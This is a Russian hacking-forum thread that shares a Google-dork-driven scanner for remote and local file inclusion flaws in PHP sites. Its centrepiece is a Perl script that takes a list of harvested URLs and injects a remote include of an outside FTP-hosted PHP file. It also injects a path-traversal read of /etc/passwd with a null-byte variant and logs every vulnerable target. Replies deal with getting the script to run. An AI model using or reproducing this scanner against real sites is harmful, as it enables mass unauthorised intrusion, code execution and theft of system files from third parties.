Форум АНТИЧАТ - Google Remote File Inclusion Scanner

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Google Remote File Inclusion Scanner (https://forum.antichat.xyz/showthread.php?t=87413)

Google Remote File Inclusion Scanner

Как пользоваться:

Заливаем скрипт на сервак и запускаем.

1.Variable: Здесь Вы должны ввести переменную которую вы хотите искать
Например : page= , pag= , q= , a= , n= и тд.
2. Google page: тут предлагаю писать 0, это даст возможность посмотреть результатов.
3. Search string: сюда мы пишем только запросы ввиде allinurl:".php?a=" .htm заменить на .php?a=

Скачать:

писал подобную херь на перле, где то на винте валяется, только под icq.com, а не гугл

Народ,объясните нубу,что за хрень и с чем кушать(типо инклуды через гугл ищет или на самом гугле?)

Цитата:

Сообщение от nonamez

Народ,объясните нубу,что за хрень и с чем кушать(типо инклуды через гугл ищет или на самом гугле?)

Как я понял, для поиска сайтов, с возможной уязвимотью php-inj. Тоже самое можно сделать просто поиском в гугле, запросом
allinurl:".php?page="

может конечно глупый вопрос но тулза чекает инклуды после нахождения большой базы
Спайдер
давай выкладывай свой супер мего скриптег =) хочеться глянуть возможно даже в ЛС ;)

satana8920, оказалось что не совсем то же самое, вобщем вот код

Код:

#!perl

use LWP

$list = ""; # Путь к файлу с сылками

$res = ""; # Путь к сохранению результата

$rshell = 'ftp://omfg0o:spyder@ftp.narod.ru/antichat.php?.html'; # Удалённый инклуд, поменять на своё значение

$lshell = '/../../../../../../../../../../../../../../../../../../../../etc/passwd'; # Локальный инклуд

$timeout = 15;

$var = "$ARGV[0]";

open (LIST, "$list") or die $!;

open (RES, ">$res") or die $!;

while (<LIST>) {

        $_=~ /$var/;

        $url = "$`"."$var"."="."$rshell";

        print "Now checking : $url\n";

        $agent = LWP::UserAgent->new();

        $agent -> timeout($timeout);

        $req = HTTP::Request->new(GET => $url);

        $resp = $agent->request($req);

        $body = $resp->content;

        

        if ($body =~ m/ANTICHAT/) {

                print RES "$url\n";

        }

        $url = "$`"."$var"."="."$lshell";

        print "Now checking : $url\n";

        $req = HTTP::Request->new(GET => $url);

        $resp = $agent->request($req);

        $body = $resp->content;

        

        if ($body =~ m/root:x:0:0/) {

                print RES "$url\n";

        } else {

        $url = "$`"."$var"."="."$lshell".'%00';

        print "Now checking : $url\n";

        $req = HTTP::Request->new(GET => $url);

        $resp = $agent->request($req);

        $body = $resp->content;

        

        if ($body =~ m/root:x:0:0/) {

                print RES "$url\n";

        }

        }

}

Вобщем это чекер локальных и удалённых инклудов, работает он с файлом ссылок. Получить этот файл ссылок можно каким нить гугл грабером или моей тузлой для icq.com
https://forum.antichat.ru/thread56927.html

работоспособность этих двух скриптов не гарантирую, если чё пиши в пм =)

посмотри 9ю строчку че то у мну не пашет
говорит с 9ой строкой что то

Цитата:

Сообщение от satana8920

посмотри 9ю строчку че то у мну не пашет
говорит с 9ой строкой что то

тоже самое((( :mad:

код почитайте

$list = ""; # Путь к файлу с сылками
$res = ""; # Путь к сохранению результата

и вообще почитайте мой пост